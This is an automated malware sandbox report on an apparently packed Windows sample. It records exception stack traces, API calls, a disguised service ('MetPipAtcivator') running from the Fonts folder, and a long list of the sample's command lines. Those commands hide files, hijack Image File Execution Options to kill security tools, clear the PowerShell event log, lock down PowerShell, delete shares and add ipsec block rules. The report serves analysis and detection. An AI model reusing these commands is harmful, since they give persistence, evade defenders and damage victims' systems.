RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x752f8926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x752fd55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x7532c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x752fd1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x752fd1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x752fd40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x752f991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x752f8d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x73db6f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x73db6e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x73db27a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x73db2652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x73db253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x73db2411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x73db25ab
wmic+0x39c80 @ 0x899c80
wmic+0x3b06a @ 0x89b06a
wmic+0x3b1f8 @ 0x89b1f8
wmic+0x36fcd @ 0x896fcd
wmic+0x3d6e9 @ 0x89d6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 2746992
registers.edi: 1974991376
registers.eax: 2746992
registers.ebp: 2747072
registers.edx: 1
registers.ebx: 2878908
registers.esi: 2147746133
registers.ecx: 1539098129
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 48230748
registers.edi: 2757844
registers.eax: 48230748
registers.ebp: 48230828
registers.edx: 49
registers.ebx: 48231112
registers.esi: 2147746133
registers.ecx: 2516344
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x7532c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x752f8926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x752fd55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x7532c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x752fd1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x752fd1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x752fd40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x752f991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x752f8d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x73d36f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x73d36e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x73d327a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x73d32652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x73d3253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x73d32411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x73d325ab
wmic+0x39c80 @ 0xb79c80
wmic+0x3b06a @ 0xb7b06a
wmic+0x3b1f8 @ 0xb7b1f8
wmic+0x36fcd @ 0xb76fcd
wmic+0x3d6e9 @ 0xb7d6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 1108760
registers.edi: 1974991376
registers.eax: 1108760
registers.ebp: 1108840
registers.edx: 1
registers.ebx: 2485668
registers.esi: 2147746133
registers.ecx: 1538746585
1 0 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 3240
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2452
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2564
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f41000
process_handle: 0xffffffff
1 0 0
name TEXTINCLUDE language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d82ce0 size 0x00000151
name TEXTINCLUDE language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d82ce0 size 0x00000151
name TEXTINCLUDE language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d82ce0 size 0x00000151
name RT_CURSOR language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d831d0 size 0x000000b4
name RT_CURSOR language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d831d0 size 0x000000b4
name RT_CURSOR language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d831d0 size 0x000000b4
name RT_CURSOR language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d831d0 size 0x000000b4
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_BITMAP language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d848d8 size 0x00000144
name RT_MENU language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d91424 size 0x00000284
name RT_MENU language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d91424 size 0x00000284
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d9266c size 0x0000018c
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d9266c size 0x0000018c
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d9266c size 0x0000018c
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d9266c size 0x0000018c
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d9266c size 0x0000018c
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d9266c size 0x0000018c
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d9266c size 0x0000018c
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d9266c size 0x0000018c
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d9266c size 0x0000018c
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d9266c size 0x0000018c
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d930b4 size 0x00000024
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d930b4 size 0x00000024
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d930b4 size 0x00000024
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d930b4 size 0x00000024
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d930b4 size 0x00000024
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d930b4 size 0x00000024
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d930b4 size 0x00000024
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d930b4 size 0x00000024
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d930b4 size 0x00000024
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d930b4 size 0x00000024
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d930b4 size 0x00000024
name RT_GROUP_CURSOR language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d93100 size 0x00000022
name RT_GROUP_CURSOR language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d93100 size 0x00000022
name RT_GROUP_CURSOR language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d93100 size 0x00000022
name RT_GROUP_ICON language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d931a0 size 0x00000014
name RT_GROUP_ICON language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d931a0 size 0x00000014
name RT_GROUP_ICON language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00d931a0 size 0x00000014
file c:\Windows\Fonts\svchost.exe
file C:\Users\test22\AppData\Local\Temp\tem.vbs
file c:\Windows\Fonts\conhost.exe
file C:\Windows\Temp\csonhost.bat
Time & API Arguments Status Return Repeated

SetFileAttributesW

 file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: c:\windows\Fonts\conhost.exe
filepath: c:\Windows\Fonts\conhost.exe
1 1 0

SetFileAttributesW

 file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: c:\windows\Fonts\svchost.exe
filepath: c:\Windows\Fonts\svchost.exe
1 1 0

SetFileAttributesW

 file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: c:\windows\Fonts\WinRing0x64.sys
filepath: c:\Windows\Fonts\WinRing0x64.sys
1 1 0

SetFileAttributesW

 file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\test22\AppData\Local\Temp\tem.vbs
filepath: C:\Users\test22\AppData\Local\Temp\tem.vbs
1 1 0
Time & API Arguments Status Return Repeated

CreateServiceW

 service_start_name:
start_type: 2
password:
display_name: MetPipAtcivator
filepath: c:\Windows\Fonts\svchost.exe
service_name: MetPipAtcivator
filepath_r: c:\windows\Fonts\svchost.exe
desired_access: 983551
service_handle: 0x0000000000253a80
error_control: 1
service_type: 16
service_manager_handle: 0x0000000000253a50
1 2439808 0
cmdline attrib +s +h +r C:\Windows\svchost.exe
cmdline c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service
cmdline takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
cmdline c:\windows\Fonts\svchost.exe start MetPipAtcivator
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
cmdline taskkill /f /t /im powershell.exe
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
cmdline c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system
cmdline wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo y"
cmdline takeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
cmdline wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate
cmdline c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
cmdline wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate
cmdline wevtutil cl "windows powershell"
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f
cmdline cacls C:\Windows\svchost.exe /d everyone
file C:\Users\test22\AppData\Local\Temp\tem.vbs
file C:\Users\test22\AppData\Local\Temp\iexplore.exe
wmi SELECT * FROM Win32_Process WHERE name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'
wmi SELECT * FROM Win32_Process WHERE name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'
wmi SELECT * FROM Win32_Process WHERE name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
wmi SELECT * FROM Win32_Process WHERE name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'
section {u'size_of_data': u'0x003e3c00', u'virtual_address': u'0x009b3000', u'entropy': 7.999944304938328, u'name': u'UPX1', u'virtual_size': u'0x003e4000'} entropy 7.99994430494 description A section with a high entropy has been found
section {u'size_of_data': u'0x0000dc00', u'virtual_address': u'0x00d97000', u'entropy': 6.9456545060373385, u'name': u'.rsrc', u'virtual_size': u'0x0000e000'} entropy 6.94565450604 description A section with a high entropy has been found
entropy 1.0 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeSecurityPrivilege
1 1 0
section UPX0 description Section name indicates UPX
section UPX1 description Section name indicates UPX
cmdline sc stop MetPipAtcivator
cmdline attrib +s +h +r C:\Windows\svchost.exe
cmdline net stop mssecsvc2.0
cmdline net stop mssecsvc2.1
cmdline sc delete mssecsvc2.1
cmdline sc delete Graphipcs_PerfSvcs
cmdline attrib -s -h -r -a C:\Windows\Fonts
cmdline net share d$ /delete
cmdline reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
cmdline sc config PolicyAgent start= AUTO
cmdline sc stop MicrosotMaims
cmdline attrib +s +h +r C:\Windows\boy.exe
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f
cmdline sc stop Graphipcs_PerfSvcs
cmdline sc delete MicrosotMais
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
cmdline taskkill /f /t /im sqlservr.exe
cmdline attrib +s +h +r C:\Windows\Fonts\sqlservr.exe
cmdline taskkill /f /t /im boy.exe
cmdline netsh ipsec static del all
cmdline reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f
cmdline sc delete MetPipAtcivator
cmdline net user mm123$ /del
cmdline taskkill /f /t /im powershell.exe
cmdline netsh ipsec static add filterlist name=denylist
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f
cmdline netsh ipsec static add filterlist name=Allowlist
cmdline taskkill /f /t /im d1lhots.exe
cmdline netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
cmdline netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
cmdline netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
cmdline netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
cmdline wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate
cmdline sc delete MicrosotMaims
cmdline taskkill /f /t /im lsars.exe /im lsacs.exe
cmdline sc stop MicrosotMais
cmdline sc delete SetPipAtcivator
cmdline netsh ipsec static add filteraction name=deny action=block
cmdline sc delete "Application Layre Gateway Saervice"
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f
cmdline net share iPC$ /delete
cmdline taskkill /f /t /im dl1hots.exe
cmdline attrib +s +h +r C:\Windows\Fonts\csrss.exe
cmdline sc stop "Application Layre Gateway Saervice"
cmdline attrib +s +h +r C:\Windows\lsass.exe
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
